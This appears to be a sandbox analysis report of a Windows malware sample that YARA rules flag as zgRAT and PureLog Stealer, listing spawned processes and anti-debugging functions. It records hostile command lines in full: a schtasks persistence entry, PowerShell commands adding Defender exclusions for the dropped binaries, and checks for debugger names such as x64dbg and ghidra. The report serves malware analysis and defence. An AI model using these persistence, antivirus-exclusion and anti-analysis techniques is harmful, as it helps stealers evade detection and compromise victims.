Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"
Imagebase:	0x7ff7e2090000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:56:05
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:56:05
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
Imagebase:	0x7ff67ffc0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:56:06
Start date:	30/09/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
Imagebase:	0x7ff67a480000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:56:06
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:56:06
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:56:06
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:56:06
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:56:06
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat"
Imagebase:	0x7ff722710000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:56:06
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:56:07
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Imagebase:	0x330000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:56:07
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff605410000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:56:07
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Imagebase:	0x1b0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:56:07
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0xa00000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:56:07
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0x890000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:56:07
Start date:	30/09/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6480f0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:56:10
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	13:56:17
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0x3d0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	13:56:17
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Imagebase:	0x280000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	13:56:22
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
Imagebase:	0x7ff722710000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	13:56:22
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	13:56:22
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff605410000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	13:56:22
Start date:	30/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff738fb0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	13:56:26
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0xef0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	13:56:30
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Imagebase:	0x400000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	13:56:35
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Imagebase:	0x5a0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	13:56:43
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0x8f0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	13:56:46
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
Imagebase:	0x7ff722710000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	13:56:46
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	13:56:46
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff605410000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	13:56:46
Start date:	30/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff738fb0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	13:57:03
Start date:	30/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32%
Total number of Nodes:	419
Total number of Limit Nodes:	9

Executed Functions

Function 00007FF674174BD0 Relevance: 119.0, APIs: 63, Strings: 4, Instructions: 1714threadlibrarymemoryCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00007FF674174BFF
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674174E7F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674174E8A
GetCurrentProcess.KERNEL32 ref: 00007FF674174E97
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF674174EA5
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417513F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417514A
LoadLibraryA.KERNEL32 ref: 00007FF674175160
GetProcAddress.KERNEL32 ref: 00007FF674175170
GetCurrentProcess.KERNEL32 ref: 00007FF674175179
NtQueryInformationProcess.NTDLL ref: 00007FF674175194
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417542F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417543A
memset.VCRUNTIME140 ref: 00007FF67417544E
GetCurrentThread.KERNEL32 ref: 00007FF67417545A
GetThreadContext.KERNEL32 ref: 00007FF674175468
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674175632
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417563D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741757E2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741757ED
GetCurrentProcess.KERNEL32 ref: 00007FF6741757F4
OpenProcessToken.ADVAPI32 ref: 00007FF674175807
GetTokenInformation.KERNELBASE ref: 00007FF67417582B
CloseHandle.KERNELBASE ref: 00007FF67417585E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674175A02
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674175A0D
CloseHandle.KERNEL32 ref: 00007FF674175A19
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674175BB2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674175BBD
VirtualAlloc.KERNELBASE ref: 00007FF674175BD4
memset.VCRUNTIME140 ref: 00007FF674175BF0
VirtualFree.KERNELBASE ref: 00007FF674175C21
SetLastError.KERNEL32 ref: 00007FF674175C29
GetLastError.KERNEL32 ref: 00007FF674175C36
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674175DE2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674175DED
VirtualFree.KERNEL32 ref: 00007FF674175DFF
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674175FA2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674175FAD
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF674175FC3
Thread32First.KERNEL32 ref: 00007FF674175FE6
GetCurrentProcessId.KERNEL32 ref: 00007FF674175FF0
GetCurrentThreadId.KERNEL32 ref: 00007FF674175FFC
OpenThread.KERNEL32 ref: 00007FF674176013
LoadLibraryA.KERNEL32 ref: 00007FF674176028
GetProcAddress.KERNEL32 ref: 00007FF674176038
NtSetInformationThread.NTDLL ref: 00007FF674176051
CloseHandle.KERNELBASE ref: 00007FF674176056
Thread32Next.KERNEL32 ref: 00007FF674176064
CloseHandle.KERNELBASE ref: 00007FF674176071
GetTickCount.KERNEL32 ref: 00007FF674176077
GetTickCount.KERNEL32 ref: 00007FF6741760A6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417624B
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674176256
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741764FF
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417650A
GetProcessHeap.KERNEL32 ref: 00007FF674176511
HeapSetInformation.KERNEL32 ref: 00007FF674176525
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741766D2
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741766DD
VirtualAlloc.KERNELBASE ref: 00007FF6741766F7
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417689B
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6741768A6

Strings

9999999999999999, xrefs: 00007FF674174F13, 00007FF67417520B, 00007FF6741762D5
NtSetInformationThread, xrefs: 00007FF674176031
NtQueryInformationProcess, xrefs: 00007FF674175169
ntdll.dll, xrefs: 00007FF674175151, 00007FF674176021

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit$Process$Current$Thread$CloseHandleInformationVirtual$AddressAllocCountDebuggerErrorFreeHeapLastLibraryLoadOpenPresentProcThread32TickTokenmemset$CheckContextCreateFirstNextQueryRemoteSnapshotToolhelp32
String ID: 9999999999999999$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll
API String ID: 3073719868-2705509071
Opcode ID: 2586622a73164593dd59af5e73bc46dd9c19232d007e0ac099a88cbca2fd6c87
Instruction ID: c84fa44907c5fc823b9a923f78748c5e49e79b258086460ab834d744b3a17ccf
Opcode Fuzzy Hash: 2586622a73164593dd59af5e73bc46dd9c19232d007e0ac099a88cbca2fd6c87
Instruction Fuzzy Hash: 53F20327D3DB93CAF703A735A8860B4E754AFA36C0B51D337E95875A51FF2AB1818204

Function 00007FF674174760 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 241
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF67417478C
GetProcAddress.KERNEL32 ref: 00007FF67417479C
VirtualProtect.KERNELBASE ref: 00007FF6741747B8
VirtualProtect.KERNELBASE ref: 00007FF6741747D9

Part of subcall function 00007FF674174220: ?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF67417423F

LoadLibraryA.KERNEL32 ref: 00007FF6741747EB
GetProcAddress.KERNEL32 ref: 00007FF6741747FB
GetCurrentThread.KERNEL32 ref: 00007FF674174809
NtSetInformationThread.NTDLL ref: 00007FF67417481D
QueryPerformanceFrequency.KERNEL32 ref: 00007FF674174824
QueryPerformanceCounter.KERNEL32 ref: 00007FF67417482F
QueryPerformanceCounter.KERNEL32 ref: 00007FF67417485A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674174B6F
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674174B7A

Strings

kernel32.dll, xrefs: 00007FF674174781
IsDebuggerPresent, xrefs: 00007FF674174795
NtSetInformationThread, xrefs: 00007FF6741747F4
ntdll.dll, xrefs: 00007FF6741747E4

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll
API String ID: 995830000-2640589995
Opcode ID: 921764669f81edeb392265c61d5b8528d01e22cab9824b489f624638d680a8d4
Instruction ID: cac16077dde8e46e349466c73a9e940ff37e502f24c00cbd3ff3f929b7c55121
Opcode Fuzzy Hash: 921764669f81edeb392265c61d5b8528d01e22cab9824b489f624638d680a8d4
Instruction Fuzzy Hash: BBB1E327D39B82C6F703A735A846265E724AFA7780F51D333FA5872A51EF29F1818604

Function 00007FF674174300 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8

Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988

Part of subcall function 00007FF67417E8B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67417E9A6

Part of subcall function 00007FF67417E8B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E965

FindWindowA.USER32 ref: 00007FF6741744BF
FindWindowA.USER32 ref: 00007FF6741745F5

Strings

IDAVW32, xrefs: 00007FF674174576
immunitydebugger.exe, xrefs: 00007FF6741743E8
ida.exe, xrefs: 00007FF67417439C
ghidra.exe, xrefs: 00007FF67417440E
OLLYDBG, xrefs: 00007FF6741744FE
ida64.exe, xrefs: 00007FF6741743C2
WinDbgFrameClass, xrefs: 00007FF674174527
ollydbg.exe, xrefs: 00007FF674174350
IDAVW64, xrefs: 00007FF67417454F
x64dbg.exe, xrefs: 00007FF674174376
windbg.exe, xrefs: 00007FF674174437

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: FindWindowmemcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
API String ID: 3370411492-2758119655
Opcode ID: 86faf16ee390c8af09e715d5af5e24c96e4af863d05e289d530ff53a92d4c083
Instruction ID: f4d3b892f67292fe720c9fad312042cf5426e3b4d021e31d36062defcee3093d
Opcode Fuzzy Hash: 86faf16ee390c8af09e715d5af5e24c96e4af863d05e289d530ff53a92d4c083
Instruction Fuzzy Hash: 1A918623E68BC5C5E711DB34D8852F96361FB99348F506335E98C96A55EF7CE284C300

Function 00007FF67418A650 Relevance: 13.7, APIs: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF674171400: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF67417140B
Part of subcall function 00007FF674171400: __std_exception_copy.VCRUNTIME140 ref: 00007FF674171444

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418A779

Part of subcall function 00007FF674171360: __std_exception_copy.VCRUNTIME140 ref: 00007FF6741713A4

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A7E7
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A854
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A87D
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A8AF
